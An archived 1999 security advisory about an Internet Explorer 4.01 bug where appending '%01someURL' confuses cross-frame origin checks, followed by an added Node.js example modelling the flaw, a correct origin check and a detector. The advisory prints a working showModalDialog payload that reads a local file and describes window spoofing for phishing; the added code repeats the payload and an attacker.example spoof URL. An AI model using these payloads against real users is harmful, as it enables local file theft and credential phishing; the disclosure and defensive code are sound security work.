Javascript security bug in Internet Explorer

From: Georgi Guninski (guninskiat_private)
Date: Tue Jan 26 1999 - 08:46:03 PST


    There is a Javascript security bug in Internet Explorer 4.01 (patched),
    which circumvents "Cross-frame security" and opens several security
    holes.
    
    The problem is: if you add '%01someURL' after the URL, IE thinks that the
    document is loaded from the domain of 'someURL'. Very strange?
    
    Some of the bugs are:
    
    1) IE allows reading local files and sending them to an arbitrary
    server.
    The filename must be known.
    The bug may be exploited using an HTML mail message.
    Demo is available at:
    http://www.geocities.com/ResearchTriangle/1711/read3.html
    This works on IE 4.0 also.
    The javascript code is:
    // Tell the user which file the demo is going to read.
    alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.')
    // The about: URL carries the payload. The trailing %01file://c:/ makes IE
    // treat the dialog as if it were loaded from the file: domain, so the
    // script inside it may open file://c:/test.txt and read its body text.
    // The closing tag is split ("</"+"SCRIPT>") so that the HTML parser of
    // the page carrying this code does not end the outer script block early.
    b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file:\\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/");
    
    2) IE allows "window spoofing".
    After visiting a hostile page (or clicking a hostile link) a window is
    opened and its location is a trusted site. However, the content of the
    window is not that of the original site, but it is supplied by the owner
    of the page. So, the user is misled into believing he is browsing a
    trusted site, while he is browsing a hostile page and may provide
    sensitive information, such as a credit card number.
    The bug may be exploited using an HTML mail message.
    Demo is available at:
    http://www.geocities.com/ResearchTriangle/1711/read4.html
    
    Workaround: Disable Javascript
    
    Regards,
    Georgi Guninski
    TechnoLogica Ltd, Bulgaria
    
    http://www.geocities.com/ResearchTriangle/1711
    http://www.whitehats.com/guninski
    
    
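    The origin confusion described in the post, as an added example that is
    not code from the post or from Microsoft. naiveOrigin() is a hypothetical
    model of the observed behaviour ("%01someURL" appended to a URL makes the
    document count as coming from someURL's domain), not IE's real code; it is
    placed beside a correct same-origin decision built on the WHATWG URL
    parser, plus a small detector for the pattern. The payload string is
    copied from the post; the attacker.example / trusted.example URL is
    constructed for this example.

```javascript
// Added example, not from Guninski's post. Runs under Node.js (global URL).

// Payload from the post, kept as a string constant so it can be inspected
// offline. "\\n" is the two-character escape as it appears in the post.
const POST_PAYLOAD =
  "about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file:" +
  "\\n\\n'+a.document.body.innerText;alert(s);a.close();close()</" +
  "SCRIPT>%01file://c:/";

// Constructed "window spoofing" variant (bug 2): an attacker page that is
// meant to be taken for a trusted site. Hostnames are made up.
const SPOOFED = 'http://attacker.example/page.html%01https://trusted.example/';

// Hypothetical model of the flaw: whatever follows the last control
// character (raw 0x01 or its %01 encoding) is treated as the document URL,
// and the domain used for cross-frame decisions is read from that.
function naiveOrigin(url) {
  const tail = url.split(/\x01|%01/).pop();
  const u = new URL(tail);
  return `${u.protocol}//${u.host}`;
}

// Correct: parse the string once, as a whole. The WHATWG parser leaves
// "%01https://..." inside the path, so the origin is that of the real host.
// Non-HTTP(S) schemes such as file: and about: get the opaque origin "null",
// which never compares equal, so two such documents cannot script each other.
function strictOrigin(url) {
  return new URL(url).origin;
}

// Cross-frame policy: one window may script another only when both resolve
// to the same, non-opaque origin.
function canScript(fromUrl, toUrl) {
  const a = strictOrigin(fromUrl);
  return a !== 'null' && a === strictOrigin(toUrl);
}

// Detector for the bug pattern itself: a control character (raw or
// percent-encoded C0) followed by something that looks like a second URL.
// Returns the embedded URL, or null when the pattern is absent. Usable for
// log review or as an input filter in front of a legacy client.
function embeddedUrlAfterControl(url) {
  const m = url.match(
    /(?:[\x00-\x1f]|%[01][0-9a-f])([a-z][a-z0-9+.-]*:\/\/[^\s'"]*)/i
  );
  return m ? m[1] : null;
}

// Demonstration: the naive check lets the attacker page pass as the trusted
// site; the strict check does not, and the detector flags both payloads.
function demo() {
  return {
    naiveSpoof: naiveOrigin(SPOOFED) === naiveOrigin('https://trusted.example/login'),
    strictSpoof: canScript(SPOOFED, 'https://trusted.example/login'),
    flagged: [embeddedUrlAfterControl(POST_PAYLOAD), embeddedUrlAfterControl(SPOOFED)],
  };
}

console.log(demo());
```

    The fix that matters is the one in strictOrigin(): decide the origin from
    a single parse of the whole string, never from a substring chosen after
    the fact. The detector is only a stopgap for clients that cannot be
    patched.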
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:31:11 PDT